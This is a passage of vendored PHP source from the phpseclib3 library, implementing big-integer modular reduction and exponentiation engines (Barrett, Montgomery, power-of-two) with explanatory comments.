substr($temp, 0, ' . (-($m_length >> 1) - 1) . '); $temp = bcmul($temp, ' . $m . '); $result = bcsub($n, $temp); if ($result[0] == \'-\') { $temp = \'1' . \str_repeat('0', $m_length + 1) . '\'; $result = bcadd($result, $temp); } while (bccomp($result, ' . $m . ') >= 0) { $result = bcsub($result, ' . $m . '); } return $result;'; eval('$func = function ($n) { ' . $code . '};'); self::$custom_reduction = $func; return $func; } } <?php /** * BCMath Barrett Modular Exponentiation Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath\Reductions; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath\Base; /** * PHP Barrett Modular Exponentiation Engine * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Barrett extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath\Base { /** * Cache constants * * $cache[self::VARIABLE] tells us whether or not the cached data is still valid. * */ const VARIABLE = 0; /** * $cache[self::DATA] contains the cached data. * */ const DATA = 1; /** * Barrett Modular Reduction * * See {@link http://www.cacr.math.uwaterloo.ca/hac/about/chap14.pdf#page=14 HAC 14.3.3} / * {@link http://math.libtomcrypt.com/files/tommath.pdf#page=165 MPM 6.2.5} for more information. Modified slightly, * so as not to require negative numbers (initially, this script didn't support negative numbers). * * Employs "folding", as described at * {@link http://www.cosic.esat.kuleuven.be/publications/thesis-149.pdf#page=66 thesis-149.pdf#page=66}. To quote from * it, "the idea [behind folding] is to find a value x' such that x (mod m) = x' (mod m), with x' being smaller than x." * * Unfortunately, the "Barrett Reduction with Folding" algorithm described in thesis-149.pdf is not, as written, all that * usable on account of (1) its not using reasonable radix points as discussed in * {@link http://math.libtomcrypt.com/files/tommath.pdf#page=162 MPM 6.2.2} and (2) the fact that, even with reasonable * radix points, it only works when there are an even number of digits in the denominator. The reason for (2) is that * (x >> 1) + (x >> 1) != x / 2 + x / 2. If x is even, they're the same, but if x is odd, they're not. See the in-line * comments for details. * * @param string $n * @param string $m * @return string */ protected static function reduce($n, $m) { static $cache = [self::VARIABLE => [], self::DATA => []]; $m_length = \strlen($m); if (\strlen($n) > 2 * $m_length) { return \bcmod($n, $m); } // if (m.length >> 1) + 2 <= m.length then m is too small and n can't be reduced if ($m_length < 5) { return self::regularBarrett($n, $m); } // n = 2 * m.length $correctionNeeded = \false; if ($m_length & 1) { $correctionNeeded = \true; $n .= '0'; $m .= '0'; $m_length++; } if (($key = \array_search($m, $cache[self::VARIABLE])) === \false) { $key = \count($cache[self::VARIABLE]); $cache[self::VARIABLE][] = $m; $lhs = '1' . \str_repeat('0', $m_length + ($m_length >> 1)); $u = \bcdiv($lhs, $m, 0); $m1 = \bcsub($lhs, \bcmul($u, $m)); $cache[self::DATA][] = [ 'u' => $u, // m.length >> 1 (technically (m.length >> 1) + 1) 'm1' => $m1, ]; } else { \extract($cache[self::DATA][$key]); } $cutoff = $m_length + ($m_length >> 1); $lsd = \substr($n, -$cutoff); $msd = \substr($n, 0, -$cutoff); $temp = \bcmul($msd, $m1); // m.length + (m.length >> 1) $n = \bcadd($lsd, $temp); // m.length + (m.length >> 1) + 1 (so basically we're adding two same length numbers) //if ($m_length & 1) { // return self::regularBarrett($n, $m); //} // (m.length + (m.length >> 1) + 1) - (m.length - 1) == (m.length >> 1) + 2 $temp = \substr($n, 0, -$m_length + 1); // if even: ((m.length >> 1) + 2) + (m.length >> 1) == m.length + 2 // if odd: ((m.length >> 1) + 2) + (m.length >> 1) == (m.length - 1) + 2 == m.length + 1 $temp = \bcmul($temp, $u); // if even: (m.length + 2) - ((m.length >> 1) + 1) = m.length - (m.length >> 1) + 1 // if odd: (m.length + 1) - ((m.length >> 1) + 1) = m.length - (m.length >> 1) $temp = \substr($temp, 0, -($m_length >> 1) - 1); // if even: (m.length - (m.length >> 1) + 1) + m.length = 2 * m.length - (m.length >> 1) + 1 // if odd: (m.length - (m.length >> 1)) + m.length = 2 * m.length - (m.length >> 1) $temp = \bcmul($temp, $m); // at this point, if m had an odd number of digits, we'd be subtracting a 2 * m.length - (m.length >> 1) digit // number from a m.length + (m.length >> 1) + 1 digit number. ie. there'd be an extra digit and the while loop // following this comment would loop a lot (hence our calling _regularBarrett() in that situation). $result = \bcsub($n, $temp); //if (bccomp($result, '0') < 0) { if ($result[0] == '-') { $temp = '1' . \str_repeat('0', $m_length + 1); $result = \bcadd($result, $temp); } while (\bccomp($result, $m) >= 0) { $result = \bcsub($result, $m); } return $correctionNeeded ? \substr($result, 0, -1) : $result; } /** * (Regular) Barrett Modular Reduction * * For numbers with more than four digits BigInteger::_barrett() is faster. The difference between that and this * is that this function does not fold the denominator into a smaller form. * * @param string $x * @param string $n * @return string */ private static function regularBarrett($x, $n) { static $cache = [self::VARIABLE => [], self::DATA => []]; $n_length = \strlen($n); if (\strlen($x) > 2 * $n_length) { return \bcmod($x, $n); } if (($key = \array_search($n, $cache[self::VARIABLE])) === \false) { $key = \count($cache[self::VARIABLE]); $cache[self::VARIABLE][] = $n; $lhs = '1' . \str_repeat('0', 2 * $n_length); $cache[self::DATA][] = \bcdiv($lhs, $n, 0); } $temp = \substr($x, 0, -$n_length + 1); $temp = \bcmul($temp, $cache[self::DATA][$key]); $temp = \substr($temp, 0, -$n_length - 1); $r1 = \substr($x, -$n_length - 1); $r2 = \substr(\bcmul($temp, $n), -$n_length - 1); $result = \bcsub($r1, $r2); //if (bccomp($result, '0') < 0) { if ($result[0] == '-') { $q = '1' . \str_repeat('0', $n_length + 1); $result = \bcadd($result, $q); } while (\bccomp($result, $n) >= 0) { $result = \bcsub($result, $n); } return $result; } } <?php /** * OpenSSL Modular Exponentiation Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\OpenSSL as Progenitor; /** * OpenSSL Modular Exponentiation Engine * * @author Jim Wigginton <terrafrost@php.net> */ abstract class OpenSSL extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\OpenSSL { } <?php /** * Built-In BCMath Modular Exponentiation Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath; /** * Built-In BCMath Modular Exponentiation Engine * * @author Jim Wigginton <terrafrost@php.net> */ abstract class BuiltIn extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath { /** * Performs modular exponentiation. * * @param BCMath $x * @param BCMath $e * @param BCMath $n * @return BCMath */ protected static function powModHelper(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $x, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath $n) { $temp = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\BCMath(); $temp->value = \bcpowmod($x->value, $e->value, $n->value); return $x->normalize($temp); } } <?php /** * Pure-PHP 32-bit BigInteger Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines; /** * Pure-PHP 32-bit Engine. * * Uses 64-bit floats if int size is 4 bits * * @author Jim Wigginton <terrafrost@php.net> */ class PHP32 extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP { // Constants used by PHP.php const BASE = 26; const BASE_FULL = 0x4000000; const MAX_DIGIT = 0x3ffffff; const MSB = 0x2000000; /** * MAX10 in greatest MAX10LEN satisfying * MAX10 = 10**MAX10LEN <= 2**BASE. */ const MAX10 = 10000000; /** * MAX10LEN in greatest MAX10LEN satisfying * MAX10 = 10**MAX10LEN <= 2**BASE. */ const MAX10LEN = 7; const MAX_DIGIT2 = 4503599627370496; /** * Initialize a PHP32 BigInteger Engine instance * * @param int $base * @see parent::initialize() */ protected function initialize($base) { if ($base != 256 && $base != -256) { return parent::initialize($base); } $val = $this->value; $this->value = []; $vals =& $this->value; $i = \strlen($val); if (!$i) { return; } while (\true) { $i -= 4; if ($i < 0) { if ($i == -4) { break; } $val = \substr($val, 0, 4 + $i); $val = \str_pad($val, 4, "\x00", \STR_PAD_LEFT); if ($val == "\x00\x00\x00\x00") { break; } $i = 0; } list(, $digit) = \unpack('N', \substr($val, $i, 4)); if ($digit < 0) { $digit += 0xffffffff + 1; } $step = \count($vals) & 3; if ($step) { $digit = (int) \floor($digit / \pow(2, 2 * $step)); } if ($step != 3) { $digit = (int) \fmod($digit, static::BASE_FULL); $i++; } $vals[] = $digit; } while (\end($vals) === 0) { \array_pop($vals); } \reset($vals); } /** * Test for engine validity * * @see parent::__construct() * @return bool */ public static function isValidEngine() { return \PHP_INT_SIZE >= 4 && !self::testJITOnWindows(); } /** * Adds two BigIntegers. * * @param PHP32 $y * @return PHP32 */ public function add(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $y) { $temp = self::addHelper($this->value, $this->is_negative, $y->value, $y->is_negative); return $this->convertToObj($temp); } /** * Subtracts two BigIntegers. * * @param PHP32 $y * @return PHP32 */ public function subtract(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $y) { $temp = self::subtractHelper($this->value, $this->is_negative, $y->value, $y->is_negative); return $this->convertToObj($temp); } /** * Multiplies two BigIntegers. * * @param PHP32 $y * @return PHP32 */ public function multiply(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $y) { $temp = self::multiplyHelper($this->value, $this->is_negative, $y->value, $y->is_negative); return $this->convertToObj($temp); } /** * Divides two BigIntegers. * * Returns an array whose first element contains the quotient and whose second element contains the * "common residue". If the remainder would be positive, the "common residue" and the remainder are the * same. If the remainder would be negative, the "common residue" is equal to the sum of the remainder * and the divisor (basically, the "common residue" is the first positive modulo). * * @param PHP32 $y * @return array{PHP32, PHP32} */ public function divide(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $y) { return $this->divideHelper($y); } /** * Calculates modular inverses. * * Say you have (30 mod 17 * x mod 17) mod 17 == 1. x can be found using modular inverses. * @param PHP32 $n * @return false|PHP32 */ public function modInverse(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $n) { return $this->modInverseHelper($n); } /** * Calculates modular inverses. * * Say you have (30 mod 17 * x mod 17) mod 17 == 1. x can be found using modular inverses. * @param PHP32 $n * @return PHP32[] */ public function extendedGCD(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $n) { return $this->extendedGCDHelper($n); } /** * Calculates the greatest common divisor * * Say you have 693 and 609. The GCD is 21. * * @param PHP32 $n * @return PHP32 */ public function gcd(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $n) { return $this->extendedGCD($n)['gcd']; } /** * Logical And * * @param PHP32 $x * @return PHP32 */ public function bitwise_and(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $x) { return $this->bitwiseAndHelper($x); } /** * Logical Or * * @param PHP32 $x * @return PHP32 */ public function bitwise_or(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $x) { return $this->bitwiseOrHelper($x); } /** * Logical Exclusive Or * * @param PHP32 $x * @return PHP32 */ public function bitwise_xor(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $x) { return $this->bitwiseXorHelper($x); } /** * Compares two numbers. * * Although one might think !$x->compare($y) means $x != $y, it, in fact, means the opposite. The reason for this is * demonstrated thusly: * * $x > $y: $x->compare($y) > 0 * $x < $y: $x->compare($y) < 0 * $x == $y: $x->compare($y) == 0 * * Note how the same comparison operator is used. If you want to test for equality, use $x->equals($y). * * {@internal Could return $this->subtract($x), but that's not as fast as what we do do.} * * @param PHP32 $y * @return int in case < 0 if $this is less than $y; > 0 if $this is greater than $y, and 0 if they are equal. * @see self::equals() */ public function compare(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $y) { return $this->compareHelper($this->value, $this->is_negative, $y->value, $y->is_negative); } /** * Tests the equality of two numbers. * * If you need to see if one number is greater than or less than another number, use BigInteger::compare() * * @param PHP32 $x * @return bool */ public function equals(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $x) { return $this->value === $x->value && $this->is_negative == $x->is_negative; } /** * Performs modular exponentiation. * * @param PHP32 $e * @param PHP32 $n * @return PHP32 */ public function modPow(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $n) { return $this->powModOuter($e, $n); } /** * Performs modular exponentiation. * * Alias for modPow(). * * @param PHP32 $e * @param PHP32 $n * @return PHP32 */ public function powMod(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $n) { return $this->powModOuter($e, $n); } /** * Generate a random prime number between a range * * If there's not a prime within the given range, false will be returned. * * @param PHP32 $min * @param PHP32 $max * @return false|PHP32 */ public static function randomRangePrime(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $max) { return self::randomRangePrimeOuter($min, $max); } /** * Generate a random number between a range * * Returns a random number between $min and $max where $min and $max * can be defined using one of the two methods: * * BigInteger::randomRange($min, $max) * BigInteger::randomRange($max, $min) * * @param PHP32 $min * @param PHP32 $max * @return PHP32 */ public static function randomRange(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $max) { return self::randomRangeHelper($min, $max); } /** * Performs exponentiation. * * @param PHP32 $n * @return PHP32 */ public function pow(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $n) { return $this->powHelper($n); } /** * Return the minimum BigInteger between an arbitrary number of BigIntegers. * * @param PHP32 ...$nums * @return PHP32 */ public static function min(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 ...$nums) { return self::minHelper($nums); } /** * Return the maximum BigInteger between an arbitrary number of BigIntegers. * * @param PHP32 ...$nums * @return PHP32 */ public static function max(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 ...$nums) { return self::maxHelper($nums); } /** * Tests BigInteger to see if it is between two integers, inclusive * * @param PHP32 $min * @param PHP32 $max * @return bool */ public function between(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP32 $max) { return $this->compare($min) >= 0 && $this->compare($max) <= 0; } } <?php /** * PHP Modular Exponentiation Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP; /** * PHP Modular Exponentiation Engine * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Base extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP { /** * Cache constants * * $cache[self::VARIABLE] tells us whether or not the cached data is still valid. * */ const VARIABLE = 0; /** * $cache[self::DATA] contains the cached data. * */ const DATA = 1; /** * Test for engine validity * * @return bool */ public static function isValidEngine() { return static::class != __CLASS__; } /** * Performs modular exponentiation. * * The most naive approach to modular exponentiation has very unreasonable requirements, and * and although the approach involving repeated squaring does vastly better, it, too, is impractical * for our purposes. The reason being that division - by far the most complicated and time-consuming * of the basic operations (eg. +,-,*,/) - occurs multiple times within it. * * Modular reductions resolve this issue. Although an individual modular reduction takes more time * then an individual division, when performed in succession (with the same modulo), they're a lot faster. * * The two most commonly used modular reductions are Barrett and Montgomery reduction. Montgomery reduction, * although faster, only works when the gcd of the modulo and of the base being used is 1. In RSA, when the * base is a power of two, the modulo - a product of two primes - is always going to have a gcd of 1 (because * the product of two odd numbers is odd), but what about when RSA isn't used? * * In contrast, Barrett reduction has no such constraint. As such, some bigint implementations perform a * Barrett reduction after every operation in the modpow function. Others perform Barrett reductions when the * modulo is even and Montgomery reductions when the modulo is odd. BigInteger.java's modPow method, however, * uses a trick involving the Chinese Remainder Theorem to factor the even modulo into two numbers - one odd and * the other, a power of two - and recombine them, later. This is the method that this modPow function uses. * {@link http://islab.oregonstate.edu/papers/j34monex.pdf Montgomery Reduction with Even Modulus} elaborates. * * @param PHP $x * @param PHP $e * @param PHP $n * @param string $class * @return PHP */ protected static function powModHelper(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP $x, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP $n, $class) { if (empty($e->value)) { $temp = new $class(); $temp->value = [1]; return $x->normalize($temp); } if ($e->value == [1]) { list(, $temp) = $x->divide($n); return $x->normalize($temp); } if ($e->value == [2]) { $temp = new $class(); $temp->value = $class::square($x->value); list(, $temp) = $temp->divide($n); return $x->normalize($temp); } return $x->normalize(static::slidingWindow($x, $e, $n, $class)); } /** * Modular reduction preparation * * @param array $x * @param array $n * @param string $class * @see self::slidingWindow() * @return array */ protected static function prepareReduce(array $x, array $n, $class) { return static::reduce($x, $n, $class); } /** * Modular multiply * * @param array $x * @param array $y * @param array $n * @param string $class * @see self::slidingWindow() * @return array */ protected static function multiplyReduce(array $x, array $y, array $n, $class) { $temp = $class::multiplyHelper($x, \false, $y, \false); return static::reduce($temp[self::VALUE], $n, $class); } /** * Modular square * * @param array $x * @param array $n * @param string $class * @see self::slidingWindow() * @return array */ protected static function squareReduce(array $x, array $n, $class) { return static::reduce($class::square($x), $n, $class); } } <?php /** * PHP Montgomery Modular Exponentiation Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Reductions\PowerOfTwo; /** * PHP Montgomery Modular Exponentiation Engine * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Montgomery extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Base { /** * Test for engine validity * * @return bool */ public static function isValidEngine() { return static::class != __CLASS__; } /** * Performs modular exponentiation. * * @template T of Engine * @param Engine $x * @param Engine $e * @param Engine $n * @param class-string<T> $class * @return T */ protected static function slidingWindow(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $x, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $n, $class) { // is the modulo odd? if ($n->value[0] & 1) { return parent::slidingWindow($x, $e, $n, $class); } // if it's not, it's even // find the lowest set bit (eg. the max pow of 2 that divides $n) for ($i = 0; $i < \count($n->value); ++$i) { if ($n->value[$i]) { $temp = \decbin($n->value[$i]); $j = \strlen($temp) - \strrpos($temp, '1') - 1; $j += $class::BASE * $i; break; } } // at this point, 2^$j * $n/(2^$j) == $n $mod1 = clone $n; $mod1->rshift($j); $mod2 = new $class(); $mod2->value = [1]; $mod2->lshift($j); $part1 = $mod1->value != [1] ? parent::slidingWindow($x, $e, $mod1, $class) : new $class(); $part2 = \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Reductions\PowerOfTwo::slidingWindow($x, $e, $mod2, $class); $y1 = $mod2->modInverse($mod1); $y2 = $mod1->modInverse($mod2); $result = $part1->multiply($mod2); $result = $result->multiply($y1); $temp = $part2->multiply($mod1); $temp = $temp->multiply($y2); $result = $result->add($temp); list(, $result) = $result->divide($n); return $result; } } <?php /** * PHP Default Modular Exponentiation Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Reductions\EvalBarrett; /** * PHP Default Modular Exponentiation Engine * * @author Jim Wigginton <terrafrost@php.net> */ abstract class DefaultEngine extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Reductions\EvalBarrett { } <?php /** * PHP Power of Two Modular Exponentiation Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Reductions; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Base; /** * PHP Power Of Two Modular Exponentiation Engine * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PowerOfTwo extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Base { /** * Prepare a number for use in Montgomery Modular Reductions * * @param array $x * @param array $n * @param string $class * @return array */ protected static function prepareReduce(array $x, array $n, $class) { return self::reduce($x, $n, $class); } /** * Power Of Two Reduction * * @param array $x * @param array $n * @param string $class * @return array */ protected static function reduce(array $x, array $n, $class) { $lhs = new $class(); $lhs->value = $x; $rhs = new $class(); $rhs->value = $n; $temp = new $class(); $temp->value = [1]; $result = $lhs->bitwise_and($rhs->subtract($temp)); return $result->value; } } <?php /** * PHP Montgomery Modular Exponentiation Engine with interleaved multiplication * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Reductions; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP; /** * PHP Montgomery Modular Exponentiation Engine with interleaved multiplication * * @author Jim Wigginton <terrafrost@php.net> */ abstract class MontgomeryMult extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Reductions\Montgomery { /** * Montgomery Multiply * * Interleaves the montgomery reduction and long multiplication algorithms together as described in * {@link http://www.cacr.math.uwaterloo.ca/hac/about/chap14.pdf#page=13 HAC 14.36} * * @see self::_prepMontgomery() * @see self::_montgomery() * @param array $x * @param array $y * @param array $m * @param class-string<PHP> $class * @return array */ public static function multiplyReduce(array $x, array $y, array $m, $class) { // the following code, although not callable, can be run independently of the above code // although the above code performed better in my benchmarks the following could might // perform better under different circumstances. in lieu of deleting it it's just been // made uncallable static $cache = [self::VARIABLE => [], self::DATA => []]; if (($key = \array_search($m, $cache[self::VARIABLE])) === \false) { $key = \count($cache[self::VARIABLE]); $cache[self::VARIABLE][] = $m; $cache[self::DATA][] = self::modInverse67108864($m, $class); } $n = \max(\count($x), \count($y), \count($m)); $x = \array_pad($x, $n, 0); $y = \array_pad($y, $n, 0); $m = \array_pad($m, $n, 0); $a = [self::VALUE => self::array_repeat(0, $n + 1)]; for ($i = 0; $i < $n; ++$i) { $temp = $a[self::VALUE][0] + $x[$i] * $y[0]; $temp = $temp - $class::BASE_FULL * ($class::BASE === 26 ? \intval($temp / 0x4000000) : $temp >> 31); $temp = $temp * $cache[self::DATA][$key]; $temp = $temp - $class::BASE_FULL * ($class::BASE === 26 ? \intval($temp / 0x4000000) : $temp >> 31); $temp = $class::addHelper($class::regularMultiply([$x[$i]], $y), \false, $class::regularMultiply([$temp], $m), \false); $a = $class::addHelper($a[self::VALUE], \false, $temp[self::VALUE], \false); $a[self::VALUE] = \array_slice($a[self::VALUE], 1); } if (self::compareHelper($a[self::VALUE], \false, $m, \false) >= 0) { $a = $class::subtractHelper($a[self::VALUE], \false, $m, \false); } return $a[self::VALUE]; } } <?php /** * PHP Montgomery Modular Exponentiation Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Reductions; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Montgomery as Progenitor; /** * PHP Montgomery Modular Exponentiation Engine * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Montgomery extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Montgomery { /** * Prepare a number for use in Montgomery Modular Reductions * * @param array $x * @param array $n * @param string $class * @return array */ protected static function prepareReduce(array $x, array $n, $class) { $lhs = new $class(); $lhs->value = \array_merge(self::array_repeat(0, \count($n)), $x); $rhs = new $class(); $rhs->value = $n; list(, $temp) = $lhs->divide($rhs); return $temp->value; } /** * Montgomery Multiply * * Interleaves the montgomery reduction and long multiplication algorithms together as described in * {@link http://www.cacr.math.uwaterloo.ca/hac/about/chap14.pdf#page=13 HAC 14.36} * * @param array $x * @param array $n * @param string $class * @return array */ protected static function reduce(array $x, array $n, $class) { static $cache = [self::VARIABLE => [], self::DATA => []]; if (($key = \array_search($n, $cache[self::VARIABLE])) === \false) { $key = \count($cache[self::VARIABLE]); $cache[self::VARIABLE][] = $x; $cache[self::DATA][] = self::modInverse67108864($n, $class); } $k = \count($n); $result = [self::VALUE => $x]; for ($i = 0; $i < $k; ++$i) { $temp = $result[self::VALUE][$i] * $cache[self::DATA][$key]; $temp = $temp - $class::BASE_FULL * ($class::BASE === 26 ? \intval($temp / 0x4000000) : $temp >> 31); $temp = $class::regularMultiply([$temp], $n); $temp = \array_merge(self::array_repeat(0, $i), $temp); $result = $class::addHelper($result[self::VALUE], \false, $temp, \false); } $result[self::VALUE] = \array_slice($result[self::VALUE], $k); if (self::compareHelper($result, \false, $n, \false) >= 0) { $result = $class::subtractHelper($result[self::VALUE], \false, $n, \false); } return $result[self::VALUE]; } /** * Modular Inverse of a number mod 2**26 (eg. 67108864) * * Based off of the bnpInvDigit function implemented and justified in the following URL: * * {@link http://www-cs-students.stanford.edu/~tjw/jsbn/jsbn.js} * * The following URL provides more info: * * {@link http://groups.google.com/group/sci.crypt/msg/7a137205c1be7d85} * * As for why we do all the bitmasking... strange things can happen when converting from floats to ints. For * instance, on some computers, var_dump((int) -4294967297) yields int(-1) and on others, it yields * int(-2147483648). To avoid problems stemming from this, we use bitmasks to guarantee that ints aren't * auto-converted to floats. The outermost bitmask is present because without it, there's no guarantee that * the "residue" returned would be the so-called "common residue". We use fmod, in the last step, because the * maximum possible $x is 26 bits and the maximum $result is 16 bits. Thus, we have to be able to handle up to * 40 bits, which only 64-bit floating points will support. * * Thanks to Pedro Gimeno Fortea for input! * * @param array $x * @param string $class * @return int */ protected static function modInverse67108864(array $x, $class) { $x = -$x[0]; $result = $x & 0x3; // x**-1 mod 2**2 $result = $result * (2 - $x * $result) & 0xf; // x**-1 mod 2**4 $result = $result * (2 - ($x & 0xff) * $result) & 0xff; // x**-1 mod 2**8 $result = $result * (2 - ($x & 0xffff) * $result & 0xffff) & 0xffff; // x**-1 mod 2**16 $result = $class::BASE == 26 ? \fmod($result * (2 - \fmod($x * $result, $class::BASE_FULL)), $class::BASE_FULL) : $result * (2 - $x * $result % $class::BASE_FULL) % $class::BASE_FULL; return $result & $class::MAX_DIGIT; } } <?php /** * PHP Classic Modular Exponentiation Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Reductions; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Base; /** * PHP Classic Modular Exponentiation Engine * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Classic extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Base { /** * Regular Division * * @param array 